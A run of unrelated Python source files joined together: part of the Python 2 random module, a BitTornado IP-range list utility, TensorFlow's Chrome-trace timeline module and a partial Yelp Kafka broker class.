SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z): return x * beta elif alpha == 1.0: # expovariate(1) u = random() while u <= 1e-7: u = random() return -_log(u) * beta else: # alpha is between 0 and 1 (exclusive) # Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle while 1: u = random() b = (_e + alpha)/_e p = b*u if p <= 1.0: x = p ** (1.0/alpha) else: x = -_log((b-p)/alpha) u1 = random() if p > 1.0: if u1 <= x ** (alpha - 1.0): break elif u1 <= _exp(-x): break return x * beta ## -------------------- Gauss (faster alternative) -------------------- def gauss(self, mu, sigma): """Gaussian distribution. mu is the mean, and sigma is the standard deviation. This is slightly faster than the normalvariate() function. Not thread-safe without a lock around calls. """ # When x and y are two variables from [0, 1), uniformly # distributed, then # # cos(2*pi*x)*sqrt(-2*log(1-y)) # sin(2*pi*x)*sqrt(-2*log(1-y)) # # are two *independent* variables with normal distribution # (mu = 0, sigma = 1). # (Lambert Meertens) # (corrected version; bug discovered by Mike Miller, fixed by LM) # Multithreading note: When two threads call this function # simultaneously, it is possible that they will receive the # same return value. The window is very small though. To # avoid this, you have to use a lock around all calls. (I # didn't want to slow this down in the serial case by using a # lock here.) random = self.random z = self.gauss_next self.gauss_next = None if z is None: x2pi = random() * TWOPI g2rad = _sqrt(-2.0 * _log(1.0 - random())) z = _cos(x2pi) * g2rad self.gauss_next = _sin(x2pi) * g2rad return mu + z*sigma ## -------------------- beta -------------------- ## See ## http://sourceforge.net/bugs/?func=detailbug&bug_id=130030&group_id=5470 ## for Ivan Frohne's insightful analysis of why the original implementation: ## ## def betavariate(self, alpha, beta): ## # Discrete Event Simulation in C, pp 87-88. ## ## y = self.expovariate(alpha) ## z = self.expovariate(1.0/beta) ## return z/(y+z) ## ## was dead wrong, and how it probably got that way. def betavariate(self, alpha, beta): """Beta distribution. Conditions on the parameters are alpha > 0 and beta > 0. Returned values range between 0 and 1. """ # This version due to Janne Sinkkonen, and matches all the std # texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution"). y = self.gammavariate(alpha, 1.) if y == 0: return 0.0 else: return y / (y + self.gammavariate(beta, 1.)) ## -------------------- Pareto -------------------- def paretovariate(self, alpha): """Pareto distribution. alpha is the shape parameter.""" # Jain, pg. 495 u = 1.0 - self.random() return 1.0 / pow(u, 1.0/alpha) ## -------------------- Weibull -------------------- def weibullvariate(self, alpha, beta): """Weibull distribution. alpha is the scale parameter and beta is the shape parameter. """ # Jain, pg. 499; bug fix courtesy Bill Arms u = 1.0 - self.random() return alpha * pow(-_log(u), 1.0/beta) ## -------------------- Wichmann-Hill ------------------- class WichmannHill(Random): VERSION = 1 # used by getstate/setstate def seed(self, a=None): """Initialize internal state from hashable object. None or no argument seeds from current time or from an operating system specific randomness source if available. If a is not None or an int or long, hash(a) is used instead. If a is an int or long, a is used directly. Distinct values between 0 and 27814431486575L inclusive are guaranteed to yield distinct internal states (this guarantee is specific to the default Wichmann-Hill generator). """ if a is None: try: a = long(_hexlify(_urandom(16)), 16) except NotImplementedError: import time a = long(time.time() * 256) # use fractional seconds if not isinstance(a, (int, long)): a = hash(a) a, x = divmod(a, 30268) a, y = divmod(a, 30306) a, z = divmod(a, 30322) self._seed = int(x)+1, int(y)+1, int(z)+1 self.gauss_next = None def random(self): """Get the next random number in the range [0.0, 1.0).""" # Wichman-Hill random number generator. # # Wichmann, B. A. & Hill, I. D. (1982) # Algorithm AS 183: # An efficient and portable pseudo-random number generator # Applied Statistics 31 (1982) 188-190 # # see also: # Correction to Algorithm AS 183 # Applied Statistics 33 (1984) 123 # # McLeod, A. I. (1985) # A remark on Algorithm AS 183 # Applied Statistics 34 (1985),198-200 # This part is thread-unsafe: # BEGIN CRITICAL SECTION x, y, z = self._seed x = (171 * x) % 30269 y = (172 * y) % 30307 z = (170 * z) % 30323 self._seed = x, y, z # END CRITICAL SECTION # Note: on a platform using IEEE-754 double arithmetic, this can # never return 0.0 (asserted by Tim; proof too long for a comment). return (x/30269.0 + y/30307.0 + z/30323.0) % 1.0 def getstate(self): """Return internal state; can be passed to setstate() later.""" return self.VERSION, self._seed, self.gauss_next def setstate(self, state): """Restore internal state from object returned by getstate().""" version = state[0] if version == 1: version, self._seed, self.gauss_next = state else: raise ValueError("state with version %s passed to " "Random.setstate() of version %s" % (version, self.VERSION)) def jumpahead(self, n): """Act as if n calls to random() were made, but quickly. n is an int, greater than or equal to 0. Example use: If you have 2 threads and know that each will consume no more than a million random numbers, create two Random objects r1 and r2, then do r2.setstate(r1.getstate()) r2.jumpahead(1000000) Then r1 and r2 will use guaranteed-disjoint segments of the full period. """ if not n >= 0: raise ValueError("n must be >= 0") x, y, z = self._seed x = int(x * pow(171, n, 30269)) % 30269 y = int(y * pow(172, n, 30307)) % 30307 z = int(z * pow(170, n, 30323)) % 30323 self._seed = x, y, z def __whseed(self, x=0, y=0, z=0): """Set the Wichmann-Hill seed from (x, y, z). These must be integers in the range [0, 256). """ if not type(x) == type(y) == type(z) == int: raise TypeError('seeds must be integers') if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256): raise ValueError('seeds must be in range(0, 256)') if 0 == x == y == z: # Initialize from current time import time t = long(time.time() * 256) t = int((t&0xffffff) ^ (t>>24)) t, x = divmod(t, 256) t, y = divmod(t, 256) t, z = divmod(t, 256) # Zero is a poor seed, so substitute 1 self._seed = (x or 1, y or 1, z or 1) self.gauss_next = None def whseed(self, a=None): """Seed from hashable object's hash code. None or no argument seeds from current time. It is not guaranteed that objects with distinct hash codes lead to distinct internal states. This is obsolete, provided for compatibility with the seed routine used prior to Python 2.1. Use the .seed() method instead. """ if a is None: self.__whseed() return a = hash(a) a, x = divmod(a, 256) a, y = divmod(a, 256) a, z = divmod(a, 256) x = (x + a) % 256 or 1 y = (y + a) % 256 or 1 z = (z + a) % 256 or 1 self.__whseed(x, y, z) ## --------------- Operating System Random Source ------------------ class SystemRandom(Random): """Alternate random number generator using sources provided by the operating system (such as /dev/urandom on Unix or CryptGenRandom on Windows). Not available on all systems (see os.urandom() for details). """ def random(self): """Get the next random number in the range [0.0, 1.0).""" return (long(_hexlify(_urandom(7)), 16) >> 3) * RECIP_BPF def getrandbits(self, k): """getrandbits(k) -> x. Generates a long int with k random bits.""" if k <= 0: raise ValueError('number of bits must be greater than zero') if k != int(k): raise TypeError('number of bits should be an integer') bytes = (k + 7) // 8 # bits / 8 and rounded up x = long(_hexlify(_urandom(bytes)), 16) return x >> (bytes * 8 - k) # trim excess bits def _stub(self, *args, **kwds): "Stub method. Not used for a system random number generator." return None seed = jumpahead = _stub def _notimplemented(self, *args, **kwds): "Method should not be called for a system random number generator." raise NotImplementedError('System entropy source does not have state.') getstate = setstate = _notimplemented ## -------------------- test program -------------------- def _test_generator(n, func, args): import time print n, 'times', func.__name__ total = 0.0 sqsum = 0.0 smallest = 1e10 largest = -1e10 t0 = time.time() for i in range(n): x = func(*args) total += x sqsum = sqsum + x*x smallest = min(x, smallest) largest = max(x, largest) t1 = time.time() print round(t1-t0, 3), 'sec,', avg = total/n stddev = _sqrt(sqsum/n - avg*avg) print 'avg %g, stddev %g, min %g, max %g' % \ (avg, stddev, smallest, largest) def _test(N=2000): _test_generator(N, random, ()) _test_generator(N, normalvariate, (0.0, 1.0)) _test_generator(N, lognormvariate, (0.0, 1.0)) _test_generator(N, vonmisesvariate, (0.0, 1.0)) _test_generator(N, gammavariate, (0.01, 1.0)) _test_generator(N, gammavariate, (0.1, 1.0)) _test_generator(N, gammavariate, (0.1, 2.0)) _test_generator(N, gammavariate, (0.5, 1.0)) _test_generator(N, gammavariate, (0.9, 1.0)) _test_generator(N, gammavariate, (1.0, 1.0)) _test_generator(N, gammavariate, (2.0, 1.0)) _test_generator(N, gammavariate, (20.0, 1.0)) _test_generator(N, gammavariate, (200.0, 1.0)) _test_generator(N, gauss, (0.0, 1.0)) _test_generator(N, betavariate, (3.0, 3.0)) _test_generator(N, triangular, (0.0, 1.0, 1.0/3.0)) # Create one instance, seeded from current time, and export its methods # as module-level functions. The functions share state across all uses #(both in the user's code and in the Python libraries), but that's fine # for most programs and is easier for the casual user than making them # instantiate their own Random() instance. _inst = Random() seed = _inst.seed random = _inst.random uniform = _inst.uniform triangular = _inst.triangular randint = _inst.randint choice = _inst.choice randrange = _inst.randrange sample = _inst.sample shuffle = _inst.shuffle normalvariate = _inst.normalvariate lognormvariate = _inst.lognormvariate expovariate = _inst.expovariate vonmisesvariate = _inst.vonmisesvariate gammavariate = _inst.gammavariate gauss = _inst.gauss betavariate = _inst.betavariate paretovariate = _inst.paretovariate weibullvariate = _inst.weibullvariate getstate = _inst.getstate setstate = _inst.setstate jumpahead = _inst.jumpahead getrandbits = _inst.getrandbits if __name__ == '__main__': _test()
# Written by John Hoffman # see LICENSE.txt for license information from bisect import bisect, insort try: True except: True = 1 False = 0 bool = lambda x: not not x hexbinmap = { '0': '0000', '1': '0001', '2': '0010', '3': '0011', '4': '0100', '5': '0101', '6': '0110', '7': '0111', '8': '1000', '9': '1001', 'a': '1010', 'b': '1011', 'c': '1100', 'd': '1101', 'e': '1110', 'f': '1111', 'x': '0000', } chrbinmap = {} for n in xrange(256): b = [] nn = n for i in xrange(8): if nn & 0x80: b.append('1') else: b.append('0') nn <<= 1 chrbinmap[n] = ''.join(b) def to_bitfield_ipv4(ip): ip = ip.split('.') if len(ip) != 4: raise ValueError, "bad address" b = [] for i in ip: b.append(chrbinmap[int(i)]) return ''.join(b) def to_bitfield_ipv6(ip): b = '' doublecolon = False if ip == '': raise ValueError, "bad address" if ip == '::': # boundary handling ip = '' elif ip[:2] == '::': ip = ip[1:] elif ip[0] == ':': raise ValueError, "bad address" elif ip[-2:] == '::': ip = ip[:-1] elif ip[-1] == ':': raise ValueError, "bad address" for n in ip.split(':'): if n == '': # double-colon if doublecolon: raise ValueError, "bad address" doublecolon = True b += ':' continue if n.find('.') >= 0: # IPv4 n = to_bitfield_ipv4(n) b += n + '0'*(32-len(n)) continue n = ('x'*(4-len(n))) + n for i in n: b += hexbinmap[i] if doublecolon: pos = b.find(':') b = b[:pos]+('0'*(129-len(b)))+b[pos+1:] if len(b) != 128: # always check size raise ValueError, "bad address" return b ipv4addrmask = to_bitfield_ipv6('::ffff:0:0')[:96] class IP_List: def __init__(self, entrylist=None): self.ipv4list = [] self.ipv6list = [] if entrylist: for ip, depth in entrylist: self._append(ip,depth) self.ipv4list.sort() self.ipv6list.sort() def __nonzero__(self): return bool(self.ipv4list or self.ipv6list) def _append(self, ip, depth = 256): if ip.find(':') < 0: # IPv4 self.ipv4list.append(to_bitfield_ipv4(ip)[:depth]) else: b = to_bitfield_ipv6(ip) if b.startswith(ipv4addrmask): self.ipv4list.append(b[96:][:depth-96]) else: self.ipv6list.append(b[:depth]) def append(self, ip, depth = 256): if ip.find(':') < 0: # IPv4 insort(self.ipv4list,to_bitfield_ipv4(ip)[:depth]) else: b = to_bitfield_ipv6(ip) if b.startswith(ipv4addrmask): insort(self.ipv4list,b[96:][:depth-96]) else: insort(self.ipv6list,b[:depth]) def includes(self, ip): if not (self.ipv4list or self.ipv6list): return False if ip.find(':') < 0: # IPv4 b = to_bitfield_ipv4(ip) else: b = to_bitfield_ipv6(ip) if b.startswith(ipv4addrmask): b = b[96:] if len(b) > 32: l = self.ipv6list else: l = self.ipv4list for map in l[bisect(l,b)-1:]: if b.startswith(map): return True if map > b: return False return False def read_fieldlist(self, file): # reads a list from a file in the format 'ip/len <whatever>' f = open(file, 'r') while True: line = f.readline() if not line: break line = line.strip().expandtabs() if not line or line[0] == '#': continue try: line, garbage = line.split(' ',1) except: pass try: line, garbage = line.split('#',1) except: pass try: ip, depth = line.split('/') except: ip = line depth = None try: if depth is not None: depth = int(depth) self._append(ip,depth) except: print '*** WARNING *** could not parse IP range: '+line f.close() self.ipv4list.sort() self.ipv6list.sort() def set_intranet_addresses(self): self.append('127.0.0.1',8) self.append('10.0.0.0',8) self.append('172.16.0.0',12) self.append('192.168.0.0',16) self.append('169.254.0.0',16) self.append('::1') self.append('fe80::',16) self.append('fec0::',16) def set_ipv4_addresses(self): self.append('::ffff:0:0',96) def ipv6_to_ipv4(ip): ip = to_bitfield_ipv6(ip) if not ip.startswith(ipv4addrmask): raise ValueError, "not convertible to IPv4" ip = ip[-32:] x = '' for i in range(4): x += str(int(ip[:8],2)) if i < 3: x += '.' ip = ip[8:] return x def to_ipv4(ip): if is_ipv4(ip): _valid_ipv4(ip) return ip return ipv6_to_ipv4(ip) def is_ipv4(ip): return ip.find(':') < 0 def _valid_ipv4(ip): ip = ip.split('.') if len(ip) != 4: raise ValueError for i in ip: chr(int(i)) def is_valid_ip(ip): try: if not ip: return False if is_ipv4(ip): _valid_ipv4(ip) return True to_bitfield_ipv6(ip) return True except: return False
# Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Timeline visualization for TensorFlow using Chrome Trace Format.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import json import six # pylint: disable=unused-import # The timeline target is usually imported as part of BUILD target # "platform_test", which includes also includes the "platform" # dependency. This is why the logging import here is okay. from tensorflow.python.platform import tf_logging as logging class AllocationMaximum(collections.namedtuple( 'AllocationMaximum', ('timestamp', 'num_bytes', 'tensors'))): """Stores the maximum allocation for a given allocator within the timelne. Parameters: timestamp: `tensorflow::Env::NowMicros()` when this maximum was reached. num_bytes: the total memory used at this time. tensors: the set of tensors allocated at this time. """ pass class StepStatsAnalysis(collections.namedtuple( 'StepStatsAnalysis', ('chrome_trace', 'allocator_maximums'))): """Stores the step stats analysis output. Parameters: chrome_trace: A dict containing the chrome trace analysis. allocator_maximums: A dict mapping allocator names to AllocationMaximum. """ pass class _ChromeTraceFormatter(object): """A helper class for generating traces in Chrome Trace Format.""" def __init__(self, show_memory=False): """Constructs a new Chrome Trace formatter.""" self._show_memory = show_memory self._events = [] self._metadata = [] def _create_event(self, ph, category, name, pid, tid, timestamp): """Creates a new Chrome Trace event. For details of the file format, see: https://github.com/catapult-project/catapult/blob/master/tracing/README.md Args: ph: The type of event - usually a single character. category: The event category as a string. name: The event name as a string. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. timestamp: The timestamp of this event as a long integer. Returns: A JSON compatible event object. """ event = {} event['ph'] = ph event['cat'] = category event['name'] = name event['pid'] = pid event['tid'] = tid event['ts'] = timestamp return event def emit_pid(self, name, pid): """Adds a process metadata event to the trace. Args: name: The process name as a string. pid: Identifier of the process as an integer. """ event = {} event['name'] = 'process_name' event['ph'] = 'M' event['pid'] = pid event['args'] = {'name': name} self._metadata.append(event) def emit_tid(self, name, pid, tid): """Adds a thread metadata event to the trace. Args: name: The thread name as a string. pid: Identifier of the process as an integer. tid: Identifier of the thread as an integer. """ event = {} event['name'] = 'thread_name' event['ph'] = 'M' event['pid'] = pid event['tid'] = tid event['args'] = {'name': name} self._metadata.append(event) def emit_region(self, timestamp, duration, pid, tid, category, name, args): """Adds a region event to the trace. Args: timestamp: The start timestamp of this region as a long integer. duration: The duration of this region as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. category: The event category as a string. name: The event name as a string. args: A JSON-compatible dictionary of event arguments. """ event = self._create_event('X', category, name, pid, tid, timestamp) event['dur'] = duration event['args'] = args self._events.append(event) def emit_obj_create(self, category, name, timestamp, pid, tid, object_id): """Adds an object creation event to the trace. Args: category: The event category as a string. name: The event name as a string. timestamp: The timestamp of this event as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. object_id: Identifier of the object as an integer. """ event = self._create_event('N', category, name, pid, tid, timestamp) event['id'] = object_id self._events.append(event) def emit_obj_delete(self, category, name, timestamp, pid, tid, object_id): """Adds an object deletion event to the trace. Args: category: The event category as a string. name: The event name as a string. timestamp: The timestamp of this event as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. object_id: Identifier of the object as an integer. """ event = self._create_event('D', category, name, pid, tid, timestamp) event['id'] = object_id self._events.append(event) def emit_obj_snapshot(self, category, name, timestamp, pid, tid, object_id, snapshot): """Adds an object snapshot event to the trace. Args: category: The event category as a string. name: The event name as a string. timestamp: The timestamp of this event as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. object_id: Identifier of the object as an integer. snapshot: A JSON-compatible representation of the object. """ event = self._create_event('O', category, name, pid, tid, timestamp) event['id'] = object_id event['args'] = {'snapshot': snapshot} self._events.append(event) def emit_flow_start(self, name, timestamp, pid, tid, flow_id): """Adds a flow start event to the trace. When matched with a flow end event (with the same 'flow_id') this will cause the trace viewer to draw an arrow between the start and end events. Args: name: The event name as a string. timestamp: The timestamp of this event as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. flow_id: Identifier of the flow as an integer. """ event = self._create_event('s', 'DataFlow', name, pid, tid, timestamp) event['id'] = flow_id self._events.append(event) def emit_flow_end(self, name, timestamp, pid, tid, flow_id): """Adds a flow end event to the trace. When matched with a flow start event (with the same 'flow_id') this will cause the trace viewer to draw an arrow between the start and end events. Args: name: The event name as a string. timestamp: The timestamp of this event as a long integer. pid: Identifier of the process generating this event as an integer. tid: Identifier of the thread generating this event as an integer. flow_id: Identifier of the flow as an integer. """ event = self._create_event('t', 'DataFlow', name, pid, tid, timestamp) event['id'] = flow_id self._events.append(event) def emit_counter(self, category, name, pid, timestamp, counter, value): """Emits a record for a single counter. Args: category: The event category as a string. name: The event name as a string. pid: Identifier of the process generating this event as an integer. timestamp: The timestamp of this event as a long integer. counter: Name of the counter as a string. value: Value of the counter as an integer. """ event = self._create_event('C', category, name, pid, 0, timestamp) event['args'] = {counter: value} self._events.append(event) def emit_counters(self, category, name, pid, timestamp, counters): """Emits a counter record for the dictionary 'counters'. Args: category: The event category as a string. name: The event name as a string. pid: Identifier of the process generating this event as an integer. timestamp: The timestamp of this event as a long integer. counters: Dictionary of counter values. """ event = self._create_event('C', category, name, pid, 0, timestamp) event['args'] = counters.copy() self._events.append(event) def format_to_string(self, pretty=False): """Formats the chrome trace to a string. Args: pretty: (Optional.) If True, produce human-readable JSON output. Returns: A JSON-formatted string in Chrome Trace format. """ trace = {} trace['traceEvents'] = self._metadata + self._events if pretty: return json.dumps(trace, indent=4, separators=(',', ': ')) else: return json.dumps(trace, separators=(',', ':')) class _TensorTracker(object): """An internal class to track the lifetime of a Tensor.""" def __init__(self, name, object_id, timestamp, pid, allocator, num_bytes): """Creates an object to track tensor references. This class is not thread safe and is intended only for internal use by the 'Timeline' class in this file. Args: name: The name of the Tensor as a string. object_id: Chrome Trace object identifier assigned for this Tensor. timestamp: The creation timestamp of this event as a long integer. pid: Process identifier of the assicaiated device, as an integer. allocator: Name of the allocator used to create the Tensor. num_bytes: Number of bytes allocated (long integer). Returns: A 'TensorTracker' object. """ self._name = name self._pid = pid self._object_id = object_id self._create_time = timestamp self._allocator = allocator self._num_bytes = num_bytes self._ref_times = [] self._unref_times = [] @property def name(self): """Name of this tensor.""" return self._name @property def pid(self): """ID of the process which created this tensor (an integer).""" return self._pid @property def create_time(self): """Timestamp when this tensor was created (long integer).""" return self._create_time @property def object_id(self): """Returns the object identifier of this tensor (integer).""" return self._object_id @property def num_bytes(self): """Size of this tensor in bytes (long integer).""" return self._num_bytes @property def allocator(self): """Name of the allocator used to create this tensor (string).""" return self._allocator @property def last_unref(self): """Last unreference timestamp of this tensor (long integer).""" return max(self._unref_times) def add_ref(self, timestamp): """Adds a reference to this tensor with the specified timestamp. Args: timestamp: Timestamp of object reference as an integer. """ self._ref_times.append(timestamp) def add_unref(self, timestamp): """Adds an unref to this tensor with the specified timestamp. Args: timestamp: Timestamp of object unreference as an integer. """ self._unref_times.append(timestamp) class Timeline(object): """A class for visualizing execution timelines of TensorFlow steps.""" def __init__(self, step_stats, graph=None): """Constructs a new Timeline. A 'Timeline' is used for visualizing the execution of a TensorFlow computation. It shows the timings and concurrency of execution at the granularity of TensorFlow Ops. This class is not thread safe. Args: step_stats: The 'StepStats' proto recording execution times. graph: (Optional) The 'Graph' that was executed. """ self._step_stats = step_stats self._graph = graph self._chrome_trace = _ChromeTraceFormatter() self._next_pid = 0 self._device_pids = {} # device name -> pid for compute activity. self._tensor_pids = {} # device name -> pid for tensors. self._tensors = {} # tensor_name -> TensorTracker self._next_flow_id = 0 self._flow_starts = {} # tensor_name -> (timestamp, pid, tid) self._alloc_times = {} # tensor_name -> ( time, allocator, size ) self._allocator_maximums = {} # allocator name => maximum bytes long def _alloc_pid(self): """Allocate a process Id.""" pid = self._next_pid self._next_pid += 1 return pid def _alloc_flow_id(self): """Allocate a flow Id.""" flow_id = self._next_flow_id self._next_flow_id += 1 return flow_id def _parse_op_label(self, label): """Parses the fields in a node timeline label.""" nn, rest = label.split(' = ') op, rest = rest.split('(') if rest == ')': inputs = [] else: inputs = rest[:-1].split(', ') return nn, op, inputs def _assign_lanes(self): """Assigns non-overlapping lanes for the activities on each device.""" for device_stats in self._step_stats.dev_stats: # TODO(pbar): Genuine thread IDs in NodeExecStats might be helpful. lanes = [0] for ns in device_stats.node_stats: l = -1 for (i, lts) in enumerate(lanes): if ns.all_start_micros > lts: l = i lanes[l] = ns.all_start_micros + ns.all_end_rel_micros break if l < 0: l = len(lanes) lanes.append(ns.all_start_micros + ns.all_end_rel_micros) ns.thread_id = l def _emit_op(self, nodestats, pid): """Generates a Chrome Trace event to show Op execution. Args: nodestats: The 'NodeExecStats' proto recording op execution. pid: The pid assigned for the device where this op ran. """ node_name = nodestats.node_name start = nodestats.all_start_micros duration = nodestats.all_end_rel_micros tid = nodestats.thread_id _, op, inputs = self._parse_op_label(nodestats.timeline_label) args = {'name': node_name, 'op': op} for i, iname in enumerate(inputs): args['input%d' % i] = iname self._chrome_trace.emit_region(start, duration, pid, tid, 'Op', op, args) def _emit_tensor_snapshot(self, tensor, timestamp, pid, tid, value): """Generate Chrome Trace snapshot event for a computed Tensor. Args: tensor: A 'TensorTracker' object. timestamp: The timestamp of this snapshot as a long integer. pid: The pid assigned for showing the device where this op ran. tid: The tid of the thread computing the tensor snapshot. value: A JSON-compliant snapshot of the object. """ desc = str(value.tensor_description).replace('"', '') snapshot = {'tensor_description': desc} self._chrome_trace.emit_obj_snapshot('Tensor', tensor.name, timestamp, pid, tid, tensor.object_id, snapshot) def _produce_tensor(self, name, timestamp, tensors_pid, allocator, num_bytes): object_id = len(self._tensors) tensor = _TensorTracker(name, object_id, timestamp, tensors_pid, allocator, num_bytes) self._tensors[name] = tensor return tensor def _allocate_pids(self): """Allocate fake process ids for each device in the StepStats.""" self._allocators_pid = self._alloc_pid() self._chrome_trace.emit_pid('Allocators', self._allocators_pid) # Add processes in the Chrome trace to show compute and data activity. for dev_stats in self._step_stats.dev_stats: device_pid = self._alloc_pid() self._device_pids[dev_stats.device] = device_pid tensors_pid = self._alloc_pid() self._tensor_pids[dev_stats.device] = tensors_pid self._chrome_trace.emit_pid(dev_stats.device + ' Compute', device_pid) self._chrome_trace.emit_pid(dev_stats.device + ' Tensors', tensors_pid) def _analyze_tensors(self, show_memory): """Analyze tensor references to track dataflow.""" for dev_stats in self._step_stats.dev_stats: device_pid = self._device_pids[dev_stats.device] tensors_pid = self._tensor_pids[dev_stats.device] for node_stats in dev_stats.node_stats: tid = node_stats.thread_id node_name = node_stats.node_name start_time = node_stats.all_start_micros end_time = node_stats.all_start_micros + node_stats.all_end_rel_micros for index, output in enumerate(node_stats.output): if index: output_name = '%s:%d' % (node_name, index) else: output_name = node_name allocation = output.tensor_description.allocation_description num_bytes = allocation.requested_bytes allocator_name = allocation.allocator_name tensor = self._produce_tensor(output_name, start_time, tensors_pid, allocator_name, num_bytes) tensor.add_ref(start_time) tensor.add_unref(end_time) self._flow_starts[output_name] = (end_time, device_pid, tid) if show_memory: self._chrome_trace.emit_obj_create('Tensor', output_name, start_time, tensors_pid, tid, tensor.object_id) self._emit_tensor_snapshot(tensor, end_time - 1, tensors_pid, tid, output) def _show_compute(self, show_dataflow): """Visualize the computation activity.""" for dev_stats in self._step_stats.dev_stats: device_pid = self._device_pids[dev_stats.device] for node_stats in dev_stats.node_stats: tid = node_stats.thread_id start_time = node_stats.all_start_micros end_time = node_stats.all_start_micros + node_stats.all_end_rel_micros _, _, inputs = self._parse_op_label(node_stats.timeline_label) self._emit_op(node_stats, device_pid) for input_name in inputs: if input_name not in self._tensors: # This can happen when partitioning has inserted a Send/Recv. # We remove the numeric suffix so that the dataflow appears to # come from the original node. Ideally, the StepStats would # contain logging for the Send and Recv nodes. index = input_name.rfind('/_') if index > 0: input_name = input_name[:index] if input_name in self._tensors: tensor = self._tensors[input_name] tensor.add_ref(start_time) tensor.add_unref(end_time - 1) if show_dataflow: # We use a different flow ID for every graph edge. create_time, create_pid, create_tid = self._flow_starts[ input_name] # Don't add flows when producer and consumer ops are on the same # pid/tid since the horizontal arrows clutter the visualization. if create_pid != device_pid or create_tid != tid: flow_id = self._alloc_flow_id() self._chrome_trace.emit_flow_start(input_name, create_time, create_pid, create_tid, flow_id) self._chrome_trace.emit_flow_end(input_name, start_time, device_pid, tid, flow_id) else: logging.warning('Can\'t find tensor %s', input_name) def _show_memory_counters(self): """Produce a counter series for each memory allocator.""" # Iterate over all tensor trackers to build a list of allocations and # frees for each allocator. Then sort the lists and emit a cumulative # counter series for each allocator. allocations = {} for name in self._tensors: tensor = self._tensors[name] self._chrome_trace.emit_obj_delete('Tensor', name, tensor.last_unref, tensor.pid, 0, tensor.object_id) allocator = tensor.allocator if allocator not in allocations: allocations[allocator] = [] num_bytes = tensor.num_bytes allocations[allocator].append((tensor.create_time, num_bytes, name)) allocations[allocator].append((tensor.last_unref, -num_bytes, name)) alloc_maxes = {} # Generate a counter series showing total allocations for each allocator. for allocator in allocations: alloc_list = allocations[allocator] alloc_list.sort() total_bytes = 0 alloc_tensor_set = set() alloc_maxes[allocator] = AllocationMaximum( timestamp=0, num_bytes=0, tensors=set()) for time, num_bytes, name in alloc_list: total_bytes += num_bytes if num_bytes < 0: alloc_tensor_set.discard(name) else: alloc_tensor_set.add(name) if total_bytes > alloc_maxes[allocator].num_bytes: alloc_maxes[allocator] = AllocationMaximum( timestamp=time, num_bytes=total_bytes, tensors=copy.deepcopy(alloc_tensor_set)) self._chrome_trace.emit_counter('Memory', allocator, self._allocators_pid, time, allocator, total_bytes) self._allocator_maximums = alloc_maxes def analyze_step_stats(self, show_dataflow=True, show_memory=True): self._allocate_pids() self._assign_lanes() self._analyze_tensors(show_memory) self._show_compute(show_dataflow) if show_memory: self._show_memory_counters() return StepStatsAnalysis( chrome_trace=self._chrome_trace, allocator_maximums=self._allocator_maximums) def generate_chrome_trace_format(self, show_dataflow=True, show_memory=True): """Produces a trace in Chrome Trace Format. Args: show_dataflow: (Optional.) If True, add flow events to the trace connecting producers and consumers of tensors. show_memory: (Optional.) If true, add object snapshot events to the trace showing the sizes and lifetimes of tensors. Returns: A JSON formatted string in Chrome Trace format. """ step_stats_analysis = self.analyze_step_stats( show_dataflow=show_dataflow, show_memory=show_memory) return step_stats_analysis.chrome_trace.format_to_string(pretty=True)
# -*- coding: utf-8 -*- # Copyright 2016 Yelp Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging class Broker(object): """Represent a Kafka broker. A broker object contains as attributes the broker id, metadata (content of the broker node in zookeeper), partitions and replication group. """ log = logging.getLogger(__name__) def __init__(self, id, metadata=None, partitions=None): self._id = id self._metadata = metadata self._partitions = partitions or set() self._decommissioned = False self._inactive = False self._replication_group = None @property def metadata(self): return self._metadata def mark_decommissioned(self): """Mark a broker as decommissioned. Decommissioned brokers can still have partitions assigned. """ self._decommissioned = True def mark_inactive(self): """Mark a broker as inactive. Inactive brokers may not have metadata.""" self._inactive = True @property def inactive(self): return self._inactive @property def replication_group(self): return self._replication_group @replication_group.setter def replication_group(self, group): self._replication_group = group @property def decommissioned(self): return self._decommissioned @property def partitions(self): return self._partitions @property def id(self): return self._id @property def topics(self): """Return the set of topics current in broker.""" return set([partition.topic for partition in self._partitions]) @property def weight(self): """Return the total weight of all partitions on this broker.""" return sum(partition.weight for partition in self.partitions) @property def size(self): """Return the total size of all partitions on this broker.""" return sum(partition.size for partition in self.partitions) @property def leader_weight(self): return sum( partition.weight for partition in self.partitions if partition.leader == self ) def empty(self): """Return true if the broker has no replicas assigned""" return len(self.partitions) == 0 def remove_partition(self, partition): """Remove partition from partition list.""" if partition in self._partitions: # Remove partition from set self._partitions.remove(partition) # Remove broker from replica list of partition partition.replicas.remove(self) else: raise ValueError( 'Partition: {topic_id}:{partition_id} not found in broker ' '{broker_id}'.format( topic_id=partition.topic.id, partition_id=partition.partition_id, broker_id=self._id, ) ) def add_partition(self, partition): """Add partition to partition list.""" assert(partition not in self._partitions) # Add partition to existing set self._partitions.add(partition) # Add broker to replica list partition.add_replica(self) def move_partition(self, partition, broker_destination): """Move partition to destination broker and adjust replicas.""" self.remove_partition(partition) broker_destination.add_partition(partition) def count_partitions(self, topic): """Return count of partitions for given topic.""" return 